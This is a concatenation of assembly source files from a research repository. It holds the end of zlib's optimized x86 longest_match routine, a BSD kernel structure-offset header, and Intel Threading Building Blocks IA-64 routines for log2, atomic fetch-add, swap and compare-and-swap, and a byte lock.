/* int best_len = s->prev_length; */
movl dsPrevLen(%edx), %eax
movl %eax, bestlen(%esp)
/* Store the sum of s->window + best_len in %esi locally, and in %esi. */
addl %eax, %esi
movl %esi, windowbestlen(%esp)
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
movw (%edi), %bx
movw %bx, scanstart(%esp)
movw -1(%edi,%eax), %bx
movl %ebx, chainlenscanend(%esp)
/* Posf *prev = s->prev; */
/* uInt wmask = s->w_mask; */
movl dsPrev(%edx), %edi
movl dsWMask(%edx), %edx
mov %edx, wmask(%esp)
/* Jump into the main loop. */
jmp LoopEntry
.balign 16
/* do {
* match = s->window + cur_match;
* if (*(ushf*)(match+best_len-1) != scan_end ||
* *(ushf*)match != scan_start) continue;
* [...]
* } while ((cur_match = prev[cur_match & wmask]) > limit
* && --chain_length != 0);
*
* Here is the inner loop of the function. The function will spend the
* majority of its time in this loop, and majority of that time will
* be spent in the first ten instructions.
*
* Within this loop:
* %ebx = chainlenscanend - i.e., ((chainlen << 16) | scanend)
* %ecx = curmatch
* %edx = curmatch & wmask
* %esi = windowbestlen - i.e., (window + bestlen)
* %edi = prev
* %ebp = limit
*
* Two optimization notes on the choice of instructions:
*
* The first instruction uses a 16-bit address, which costs an extra,
* unpairable cycle. This is cheaper than doing a 32-bit access and
* zeroing the high word, due to the 3-cycle misalignment penalty which
* would occur half the time. This also turns out to be cheaper than
* doing two separate 8-bit accesses, as the memory is so rarely in the
* L1 cache.
*
* The window buffer, however, apparently spends a lot of time in the
* cache, and so it is faster to retrieve the word at the end of the
* match string with two 8-bit loads. The instructions that test the
* word at the beginning of the match string, however, are executed
* much less frequently, and there it was cheaper to use 16-bit
* instructions, which avoided the necessity of saving off and
* subsequently reloading one of the other registers.
*/
LookupLoop:
/* 1 U & V */
movw (%edi,%edx,2), %cx /* 2 U pipe */
movl wmask(%esp), %edx /* 2 V pipe */
cmpl %ebp, %ecx /* 3 U pipe */
jbe LeaveNow /* 3 V pipe */
subl $0x00010000, %ebx /* 4 U pipe */
js LeaveNow /* 4 V pipe */
LoopEntry: movb -1(%esi,%ecx), %al /* 5 U pipe */
andl %ecx, %edx /* 5 V pipe */
cmpb %bl, %al /* 6 U pipe */
jnz LookupLoop /* 6 V pipe */
movb (%esi,%ecx), %ah
cmpb %bh, %ah
jnz LookupLoop
movl window(%esp), %eax
movw (%eax,%ecx), %ax
cmpw scanstart(%esp), %ax
jnz LookupLoop
/* Store the current value of chainlen. */
movl %ebx, chainlenscanend(%esp)
/* Point %edi to the string under scrutiny, and %esi to the string we */
/* are hoping to match it up with. In actuality, %esi and %edi are */
/* both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and %edx is */
/* initialized to -(MAX_MATCH_8 - scanalign). */
movl window(%esp), %esi
movl scan(%esp), %edi
addl %ecx, %esi
movl scanalign(%esp), %eax
movl $(-MAX_MATCH_8), %edx
lea MAX_MATCH_8(%edi,%eax), %edi
lea MAX_MATCH_8(%esi,%eax), %esi
/* Test the strings for equality, 8 bytes at a time. At the end,
* adjust %edx so that it is offset to the exact byte that mismatched.
*
* We already know at this point that the first three bytes of the
* strings match each other, and they can be safely passed over before
* starting the compare loop. So what this code does is skip over 0-3
* bytes, as much as necessary in order to dword-align the %edi
* pointer. (%esi will still be misaligned three times out of four.)
*
* It should be confessed that this loop usually does not represent
* much of the total running time. Replacing it with a more
* straightforward "rep cmpsb" would not drastically degrade
* performance.
*/
LoopCmps:
movl (%esi,%edx), %eax
movl (%edi,%edx), %ebx
xorl %ebx, %eax
jnz LeaveLoopCmps
movl 4(%esi,%edx), %eax
movl 4(%edi,%edx), %ebx
xorl %ebx, %eax
jnz LeaveLoopCmps4
addl $8, %edx
jnz LoopCmps
jmp LenMaximum
LeaveLoopCmps4: addl $4, %edx
LeaveLoopCmps: testl $0x0000FFFF, %eax
jnz LenLower
addl $2, %edx
shrl $16, %eax
LenLower: subb $1, %al
adcl $0, %edx
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
lea (%edi,%edx), %eax
movl scan(%esp), %edi
subl %edi, %eax
cmpl $MAX_MATCH, %eax
jge LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
cmpl %ebx, %eax
jg LongerMatch
movl chainlenscanend(%esp), %ebx
movl windowbestlen(%esp), %esi
movl dsPrev(%edx), %edi
movl wmask(%esp), %edx
andl %ecx, %edx
jmp LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch: movl nicematch(%esp), %ebx
movl %eax, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
cmpl %ebx, %eax
jge LeaveNow
movl window(%esp), %esi
addl %eax, %esi
movl %esi, windowbestlen(%esp)
movl chainlenscanend(%esp), %ebx
movw -1(%edi,%eax), %bx
movl dsPrev(%edx), %edi
movl %ebx, chainlenscanend(%esp)
movl wmask(%esp), %edx
andl %ecx, %edx
jmp LookupLoop
/* Accept the current string, with the maximum possible length. */
LenMaximum: movl deflatestate(%esp), %edx
movl $MAX_MATCH, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
movl dsLookahead(%edx), %eax
cmpl %eax, %ebx
jg LookaheadRet
movl %ebx, %eax
LookaheadRet:
/* Restore the stack and return from whence we came. */
addl $LocalVarsSize, %esp
popl %ebx
popl %esi
popl %edi
popl %ebp
match_init: ret
|
AIFM-sys/AIFM
| 2,751
|
shenango/apps/parsec/pkgs/libs/uptcpip/src/include/opt/bsd_assym.s
|
#define BC32SEL 0x68
#define BI_ENDCOMMON 0xc
#define BI_ESYMTAB 0x44
#define BI_KERNELNAME 0x4
#define BI_KERNEND 0x48
#define BI_NFS_DISKLESS 0x8
#define BI_SIZE 0x30
#define BI_SYMTAB 0x40
#define BI_VERSION 0x0
#define BOOTINFO_SIZE 0x54
#define EFAULT 0xe
#define ENAMETOOLONG 0x3f
#define ENOENT 0x2
#define GPROC0_SEL 0x9
#define KCSEL 0x20
#define KDSEL 0x28
#define KERNBASE 0xc0000000
#define KERNLOAD 0x400000
#define KPSEL 0x8
#define KSTACK_PAGES 0x2
#define LA_EOI 0xb0
#define LA_ICR_HI 0x310
#define LA_ICR_LO 0x300
#define LA_ISR 0x100
#define LA_SVR 0xf0
#define LA_TPR 0x80
#define LA_VER 0x30
#define MAXCOMLEN 0x13
#define MAXCPU 0x20
#define MAXPATHLEN 0x400
#define MCLBYTES 0x800
#define MD_LDT 0x0
#define NFSDISKLESS_SIZE 0x220
#define NPDEPG 0x400
#define NPDEPTD 0x400
#define NPGPTD 0x1
#define NPTEPG 0x400
#define PAGE_MASK 0xfff
#define PAGE_SHIFT 0xc
#define PAGE_SIZE 0x1000
#define PCB_CR3 0x0
#define PCB_DBREGS 0x2
#define PCB_DR0 0x1c
#define PCB_DR1 0x20
#define PCB_DR2 0x24
#define PCB_DR3 0x28
#define PCB_DR6 0x2c
#define PCB_DR7 0x30
#define PCB_EBP 0xc
#define PCB_EBX 0x14
#define PCB_EDI 0x4
#define PCB_EIP 0x18
#define PCB_ESI 0x8
#define PCB_ESP 0x10
#define PCB_EXT 0x260
#define PCB_FLAGS 0x244
#define PCB_FSD 0x250
#define PCB_GS 0x24c
#define PCB_ONFAULT 0x248
#define PCB_PSL 0x264
#define PCB_SAVEFPU_SIZE 0x200
#define PCB_SAVEFPU 0x40
#define PCB_SIZE 0x270
#define PCB_VM86CALL 0x10
#define PCB_VM86 0x268
#define PC_COMMON_TSSD 0x270
#define PC_COMMON_TSS 0x208
#define PC_CPUID 0x20
#define PC_CURPCB 0x10
#define PC_CURPMAP 0x204
#define PC_CURRENTLDT 0x280
#define PC_CURTHREAD 0x0
#define PC_FPCURTHREAD 0x8
#define PC_FSGS_GDT 0x27c
#define PC_IDLETHREAD 0x4
#define PC_PRIVATE_TSS 0x28c
#define PC_PRVSPACE 0x200
#define PC_SIZEOF 0x300
#define PC_TSS_GDT 0x278
#define PDESHIFT 0x2
#define PDESIZE 0x4
#define PDRMASK 0x3fffff
#define PDRSHIFT 0x16
#define PMC_FN_USER_CALLCHAIN 0x9
#define PM_ACTIVE 0x20
#define PTESHIFT 0x2
#define PTESIZE 0x4
#define P_MD 0x254
#define P_VMSPACE 0xd4
#define SIGF_HANDLER 0x10
#define SIGF_UC4 0x14
#define SIGF_UC 0x20
#define TDF_ASTPENDING 0x800
#define TDF_NEEDRESCHED 0x10000
#define TDP_CALLCHAIN 0x400000
#define TD_FLAGS 0x70
#define TD_LOCK 0x0
#define TD_MD 0x1ec
#define TD_PCB 0x19c
#define TD_PFLAGS 0x78
#define TD_PROC 0x4
#define TD_TID 0x3c
#define TF_CS 0x38
#define TF_EFLAGS 0x3c
#define TF_EIP 0x34
#define TF_ERR 0x30
#define TF_TRAPNO 0x2c
#define TSS_ESP0 0x4
#define UC4_EFLAGS 0x54
#define UC4_GS 0x14
#define UC_EFLAGS 0x54
#define UC_GS 0x14
#define USRSTACK 0xbfc00000
#define VM86_FRAMESIZE 0x58
#define VM_MAXUSER_ADDRESS 0xbfc00000
#define VM_PMAP 0xb0
#define V_INTR 0xc
#define V_SYSCALL 0x8
#define V_TRAP 0x4
|
AIFM-sys/AIFM
| 2,107
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/log2.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// Support for class ConcurrentVector
.section .text
.align 16
// unsigned long __TBB_machine_lg( unsigned long x );
// r32 = x
.proc __TBB_machine_lg#
.global __TBB_machine_lg#
__TBB_machine_lg:
shr r16=r32,1 // .x
;;
shr r17=r32,2 // ..x
or r32=r32,r16 // xx
;;
shr r16=r32,3 // ...xx
or r32=r32,r17 // xxx
;;
shr r17=r32,5 // .....xxx
or r32=r32,r16 // xxxxx
;;
shr r16=r32,8 // ........xxxxx
or r32=r32,r17 // xxxxxxxx
;;
shr r17=r32,13
or r32=r32,r16 // 13x
;;
shr r16=r32,21
or r32=r32,r17 // 21x
;;
shr r17=r32,34
or r32=r32,r16 // 34x
;;
shr r16=r32,55
or r32=r32,r17 // 55x
;;
or r32=r32,r16 // 64x
;;
popcnt r8=r32
;;
add r8=-1,r8
br.ret.sptk.many b0
.endp __TBB_machine_lg#
|
AIFM-sys/AIFM
| 15,888
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/atomic_support.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd1__TBB_full_fence#
.global __TBB_machine_fetchadd1__TBB_full_fence#
__TBB_machine_fetchadd1__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd1acquire
}
.endp __TBB_machine_fetchadd1__TBB_full_fence#
.proc __TBB_machine_fetchadd1acquire#
.global __TBB_machine_fetchadd1acquire#
__TBB_machine_fetchadd1acquire:
ld1 r9=[r32]
;;
Retry_1acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg1.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_1acquire
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore1__TBB_full_fence#
.global __TBB_machine_fetchstore1__TBB_full_fence#
__TBB_machine_fetchstore1__TBB_full_fence:
mf
;;
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1__TBB_full_fence#
.proc __TBB_machine_fetchstore1acquire#
.global __TBB_machine_fetchstore1acquire#
__TBB_machine_fetchstore1acquire:
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp1__TBB_full_fence#
.global __TBB_machine_cmpswp1__TBB_full_fence#
__TBB_machine_cmpswp1__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp1acquire
}
.endp __TBB_machine_cmpswp1__TBB_full_fence#
.proc __TBB_machine_cmpswp1acquire#
.global __TBB_machine_cmpswp1acquire#
__TBB_machine_cmpswp1acquire:
zxt1 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg1.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd2__TBB_full_fence#
.global __TBB_machine_fetchadd2__TBB_full_fence#
__TBB_machine_fetchadd2__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd2acquire
}
.endp __TBB_machine_fetchadd2__TBB_full_fence#
.proc __TBB_machine_fetchadd2acquire#
.global __TBB_machine_fetchadd2acquire#
__TBB_machine_fetchadd2acquire:
ld2 r9=[r32]
;;
Retry_2acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg2.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_2acquire
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore2__TBB_full_fence#
.global __TBB_machine_fetchstore2__TBB_full_fence#
__TBB_machine_fetchstore2__TBB_full_fence:
mf
;;
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2__TBB_full_fence#
.proc __TBB_machine_fetchstore2acquire#
.global __TBB_machine_fetchstore2acquire#
__TBB_machine_fetchstore2acquire:
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp2__TBB_full_fence#
.global __TBB_machine_cmpswp2__TBB_full_fence#
__TBB_machine_cmpswp2__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp2acquire
}
.endp __TBB_machine_cmpswp2__TBB_full_fence#
.proc __TBB_machine_cmpswp2acquire#
.global __TBB_machine_cmpswp2acquire#
__TBB_machine_cmpswp2acquire:
zxt2 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg2.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd4__TBB_full_fence#
.global __TBB_machine_fetchadd4__TBB_full_fence#
__TBB_machine_fetchadd4__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd4acquire
}
.endp __TBB_machine_fetchadd4__TBB_full_fence#
.proc __TBB_machine_fetchadd4acquire#
.global __TBB_machine_fetchadd4acquire#
__TBB_machine_fetchadd4acquire:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_4acquire
(p8) br.cond.dpnt Dec_4acquire
;;
ld4 r9=[r32]
;;
Retry_4acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg4.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_4acquire
br.ret.sptk.many b0
Inc_4acquire:
fetchadd4.acq r8=[r32],1
br.ret.sptk.many b0
Dec_4acquire:
fetchadd4.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore4__TBB_full_fence#
.global __TBB_machine_fetchstore4__TBB_full_fence#
__TBB_machine_fetchstore4__TBB_full_fence:
mf
;;
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4__TBB_full_fence#
.proc __TBB_machine_fetchstore4acquire#
.global __TBB_machine_fetchstore4acquire#
__TBB_machine_fetchstore4acquire:
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp4__TBB_full_fence#
.global __TBB_machine_cmpswp4__TBB_full_fence#
__TBB_machine_cmpswp4__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp4acquire
}
.endp __TBB_machine_cmpswp4__TBB_full_fence#
.proc __TBB_machine_cmpswp4acquire#
.global __TBB_machine_cmpswp4acquire#
__TBB_machine_cmpswp4acquire:
zxt4 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg4.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchadd8__TBB_full_fence#
.global __TBB_machine_fetchadd8__TBB_full_fence#
__TBB_machine_fetchadd8__TBB_full_fence:
{
mf
br __TBB_machine_fetchadd8acquire
}
.endp __TBB_machine_fetchadd8__TBB_full_fence#
.proc __TBB_machine_fetchadd8acquire#
.global __TBB_machine_fetchadd8acquire#
__TBB_machine_fetchadd8acquire:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_8acquire
(p8) br.cond.dpnt Dec_8acquire
;;
ld8 r9=[r32]
;;
Retry_8acquire:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg8.acq r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_8acquire
br.ret.sptk.many b0
Inc_8acquire:
fetchadd8.acq r8=[r32],1
br.ret.sptk.many b0
Dec_8acquire:
fetchadd8.acq r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8acquire#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore8__TBB_full_fence#
.global __TBB_machine_fetchstore8__TBB_full_fence#
__TBB_machine_fetchstore8__TBB_full_fence:
mf
;;
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8__TBB_full_fence#
.proc __TBB_machine_fetchstore8acquire#
.global __TBB_machine_fetchstore8acquire#
__TBB_machine_fetchstore8acquire:
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8acquire#
# 88 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_cmpswp8__TBB_full_fence#
.global __TBB_machine_cmpswp8__TBB_full_fence#
__TBB_machine_cmpswp8__TBB_full_fence:
{
mf
br __TBB_machine_cmpswp8acquire
}
.endp __TBB_machine_cmpswp8__TBB_full_fence#
.proc __TBB_machine_cmpswp8acquire#
.global __TBB_machine_cmpswp8acquire#
__TBB_machine_cmpswp8acquire:
mov ar.ccv=r34
;;
cmpxchg8.acq r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8acquire#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd1release#
.global __TBB_machine_fetchadd1release#
__TBB_machine_fetchadd1release:
ld1 r9=[r32]
;;
Retry_1release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg1.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_1release
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd1release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore1release#
.global __TBB_machine_fetchstore1release#
__TBB_machine_fetchstore1release:
mf
;;
xchg1 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore1release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp1release#
.global __TBB_machine_cmpswp1release#
__TBB_machine_cmpswp1release:
zxt1 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg1.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp1release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd2release#
.global __TBB_machine_fetchadd2release#
__TBB_machine_fetchadd2release:
ld2 r9=[r32]
;;
Retry_2release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg2.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_2release
br.ret.sptk.many b0
# 49 "<stdin>"
.endp __TBB_machine_fetchadd2release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore2release#
.global __TBB_machine_fetchstore2release#
__TBB_machine_fetchstore2release:
mf
;;
xchg2 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore2release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp2release#
.global __TBB_machine_cmpswp2release#
__TBB_machine_cmpswp2release:
zxt2 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg2.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp2release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd4release#
.global __TBB_machine_fetchadd4release#
__TBB_machine_fetchadd4release:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_4release
(p8) br.cond.dpnt Dec_4release
;;
ld4 r9=[r32]
;;
Retry_4release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg4.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_4release
br.ret.sptk.many b0
Inc_4release:
fetchadd4.rel r8=[r32],1
br.ret.sptk.many b0
Dec_4release:
fetchadd4.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd4release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore4release#
.global __TBB_machine_fetchstore4release#
__TBB_machine_fetchstore4release:
mf
;;
xchg4 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore4release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp4release#
.global __TBB_machine_cmpswp4release#
__TBB_machine_cmpswp4release:
zxt4 r34=r34
;;
mov ar.ccv=r34
;;
cmpxchg4.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp4release#
// DO NOT EDIT - AUTOMATICALLY GENERATED FROM tools/generate_atomic/ipf_generate.sh
# 1 "<stdin>"
# 1 "<built-in>"
# 1 "<command line>"
# 1 "<stdin>"
.section .text
.align 16
# 19 "<stdin>"
.proc __TBB_machine_fetchadd8release#
.global __TBB_machine_fetchadd8release#
__TBB_machine_fetchadd8release:
cmp.eq p6,p0=1,r33
cmp.eq p8,p0=-1,r33
(p6) br.cond.dptk Inc_8release
(p8) br.cond.dpnt Dec_8release
;;
ld8 r9=[r32]
;;
Retry_8release:
mov ar.ccv=r9
mov r8=r9;
add r10=r9,r33
;;
cmpxchg8.rel r9=[r32],r10,ar.ccv
;;
cmp.ne p7,p0=r8,r9
(p7) br.cond.dpnt Retry_8release
br.ret.sptk.many b0
Inc_8release:
fetchadd8.rel r8=[r32],1
br.ret.sptk.many b0
Dec_8release:
fetchadd8.rel r8=[r32],-1
br.ret.sptk.many b0
.endp __TBB_machine_fetchadd8release#
# 62 "<stdin>"
.section .text
.align 16
.proc __TBB_machine_fetchstore8release#
.global __TBB_machine_fetchstore8release#
__TBB_machine_fetchstore8release:
mf
;;
xchg8 r8=[r32],r33
br.ret.sptk.many b0
.endp __TBB_machine_fetchstore8release#
# 88 "<stdin>"
.section .text
.align 16
# 101 "<stdin>"
.proc __TBB_machine_cmpswp8release#
.global __TBB_machine_cmpswp8release#
__TBB_machine_cmpswp8release:
mov ar.ccv=r34
;;
cmpxchg8.rel r8=[r32],r33,ar.ccv
br.ret.sptk.many b0
.endp __TBB_machine_cmpswp8release#
|
AIFM-sys/AIFM
| 2,034
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/lock_byte.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
// Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
//
// As a special exception, you may use this file as part of a free software
// library without restriction. Specifically, if other files instantiate
// templates or use macros or inline functions from this file, or you compile
// this file and link it with other files to produce an executable, this
// file does not by itself cause the resulting executable to be covered by
// the GNU General Public License. This exception does not however
// invalidate any other reasons why the executable file might be covered by
// the GNU General Public License.
// Support for class TinyLock
.section .text
.align 16
// unsigned int __TBB_machine_trylockbyte( byte& flag );
// r32 = address of flag
.proc __TBB_machine_trylockbyte#
.global __TBB_machine_trylockbyte#
ADDRESS_OF_FLAG=r32
RETCODE=r8
FLAG=r9
BUSY=r10
SCRATCH=r11
__TBB_machine_trylockbyte:
ld1.acq FLAG=[ADDRESS_OF_FLAG]
mov BUSY=1
mov RETCODE=0
;;
cmp.ne p6,p0=0,FLAG
mov ar.ccv=r0
(p6) br.ret.sptk.many b0
;;
cmpxchg1.acq SCRATCH=[ADDRESS_OF_FLAG],BUSY,ar.ccv // Try to acquire lock
;;
cmp.eq p6,p0=0,SCRATCH
;;
(p6) mov RETCODE=1
br.ret.sptk.many b0
.endp __TBB_machine_trylockbyte#
|
AIFM-sys/AIFM
| 1,583
|
shenango/apps/parsec/pkgs/libs/tbblib/src/src/tbb/ia64-gas/ia64_misc.s
|
// Copyright 2005-2010 Intel Corporation. All Rights Reserved.
//
// This file is part of Threading Building Blocks.
//
// Threading Building Blocks is free software; you can redistribute it
// and/or modify it under the terms of the GNU General Public License
// version 2 as published by the Free Software Foundation.
//
// Threading Building Blocks is distributed in the hope that it will be
// useful, but WITHOUT ANY WARRANTY; without even the implied warranty
// of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Threading Building Blocks; if not, write to the Free Software
